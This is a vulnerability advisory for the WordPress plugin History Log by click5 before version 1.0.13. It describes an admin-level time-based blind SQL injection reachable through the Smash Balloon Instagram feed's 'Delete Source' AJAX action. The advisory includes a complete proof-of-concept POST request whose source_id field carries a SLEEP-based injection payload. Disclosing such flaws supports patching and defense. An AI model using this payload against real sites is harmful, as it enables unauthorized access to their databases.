History Log by click5 < 1.0.13 – Admin+ Time-Based Blind SQL Injection

Description

The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by admin users when using the Smash Balloon Social Photo Feed plugin alongside it.

Proof of Concept

[1] Navigate to Instagram Feed > Settings > Manage Sources, then click on "Delete Source". 

SQL Injection occurs via the "?source_id" parameter in the below POST request:

==================

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 192.168.178.130
Content-Length: 526
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Accept: */*
Origin: http://192.168.178.130
Referer: http://192.168.178.130/wp-admin/admin.php?page=sbi-settings&view=general
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: -- SNIP --
Connection: close

------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="action"

sbi_feed_saver_manager_delete_source
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="source_id"

2 AND (SELECT 1 FROM (SELECT(SLEEP(15)))PRISM)
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="username"

pentester14598
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv
Content-Disposition: form-data; name="nonce"

036ad97501
------WebKitFormBoundaryIll2x5Ak4Efzv3Gv--

==================

The AJAX hook "wp_ajax_sbi_feed_saver_manager_delete_source" subsequently passes the value of "source_id" and triggers the vulnerable SQL statement within History Log's function "click5_sbi_instagram_delete_source".